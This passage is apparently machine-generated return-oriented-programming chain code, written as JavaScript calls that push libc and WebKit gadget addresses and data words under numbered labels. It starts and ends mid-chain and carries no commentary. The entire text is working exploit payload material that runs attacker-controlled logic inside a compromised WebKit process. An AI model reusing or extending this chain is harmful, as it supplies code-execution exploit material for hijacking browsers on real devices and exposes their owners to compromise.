//pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+231000, //L4105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4105: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+231056, //L4106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4106: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi 
ropchain+231192, //L4110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+231176, //L4109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4108: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4109: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4110: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+231328, //L4113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+231360, //L4115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+231312, //L4112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4112: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4113: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4114: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4115: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+231472, //L4116+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+231464, //L4116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4116: db([0, 0]); // 0x0 set_gadgets([ ropchain+231488, //L4116+24 ropchain+261088, //L4111 libc_base+764760, //pop rsi ropchain+231528, //L4117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4117: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4119: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi 
ropchain+231648, //L4122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+231632, //L4120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4120: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4122: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+231824, //L4125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+231840, //L4126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+231792, //L4123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+231808, //L4124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4123: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4124: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4125: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4126: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+231936, //L4128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+231920, //L4127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4127: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4128: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4129: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax 
libc_base+759608 //pop rax ]); //L4130: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L4131: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+232136, //L4133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4133: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+232192, //L4134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4134: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+232328, //L4138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+232312, //L4137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4136: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4137: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4138: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+232448, //L4141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+232416, //L4139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4139: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4140: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4141: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx 
eax, al libc_base+764760, //pop rsi ropchain+232584, //L4143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+232600, //L4144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+232568, //L4142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4142: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4143: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4144: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+232760, //L4149 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+232776, //L4150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+232712, //L4146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4146: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4147: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4148: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4149: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4150: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+232888, //L4151+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+232880, //L4151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4151: db([0, 0]); // 0x0 set_gadgets([ ropchain+232904, //L4151+24 ropchain+233304, //L4145 libc_base+764760, //pop rsi ropchain+232944, //L4152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, 
r8 libc_base+763368 //pop rcx ]); //L4152: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4154: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+233064, //L4157 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+233048, //L4155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4155: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4157: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+233208, //L4160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+233224, //L4161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+233176, //L4158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4158: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4159: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4160: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4161: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+233296, //L4162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4162: db([0, 0]); // 0x0 //L4145: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+233424, //L4165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+233440, //L4166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+233408, //L4164 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4164: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4165: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4166: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+233600, //L4171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+233616, //L4172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+233552, //L4168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4168: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4169: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4170: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4171: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4172: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+233728, //L4173+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+233720, //L4173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4173: db([0, 0]); // 0x0 set_gadgets([ ropchain+233744, //L4173+24 ropchain+236960, //L4167 libc_base+764760, //pop rsi ropchain+233784, //L4174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4174: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4176: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+233904, //L4179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+233888, 
//L4177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4177: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4179: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+234048, //L4182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234016, //L4180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+234032, //L4181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4180: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4181: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4182: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+234128, //L4183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4183: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4185: db([80, 0]); // 0x50 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+234248, //L4188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234232, //L4186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4186: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4188: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+234424, //L4191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+234440, //L4192 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234392, //L4189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+234408, //L4190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4189: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4190: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4191: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4192: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+234600, //L4196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+234568, //L4194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+234584, //L4195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4193: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4194: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4195: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4196: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+234688, //L4197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+234704, //L4198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4197: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4198: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+234872, //L4200 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+234888, //L4201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234856, //L4199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4199: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4200: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4201: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+235048, //L4206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+235064, //L4207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+235000, //L4203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4203: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4204: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4205: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L4206: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4207: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+235184, //L4208+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+235176, //L4208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4208: db([0, 0]); // 0x0 set_gadgets([ ropchain+235200, //L4208+24 ropchain+236584, //L4202 libc_base+764760, //pop rsi ropchain+235240, //L4209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx 
]); //L4209: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4211: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+235360, //L4214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235344, //L4212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4212: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4214: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+235504, //L4217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235472, //L4215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+235488, //L4216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4215: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4216: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4217: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+235584, //L4218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4218: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4220: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+235704, //L4223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235688, //L4221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4221: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop 
rdi //L4223: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+235880, //L4226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+235896, //L4227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235848, //L4224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+235864, //L4225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4224: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4225: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4226: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4227: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+236056, //L4231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+236024, //L4229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+236040, //L4230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4228: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4229: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4230: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4231: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+236144, //L4232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236160, //L4233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4232: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4233: db([0, 0]); 
// 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+236328, //L4235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236344, //L4236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+236312, //L4234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4234: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4235: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4236: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+236488, //L4239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236504, //L4240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+236456, //L4237 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4237: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4238: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4239: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4240: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+236576, //L4241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4241: db([0, 0]); // 0x0 //L4202: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+236704, //L4244 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236720, //L4245 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+236688, //L4243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4243: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4244: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4245: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+236864, //L4248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236880, //L4249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+236832, //L4246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4246: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4247: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4248: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4249: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+236952, //L4250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4250: db([0, 0]); // 0x0 //L4167: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+237080, //L4253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+237096, //L4254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+237064, //L4252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4252: db([0, 
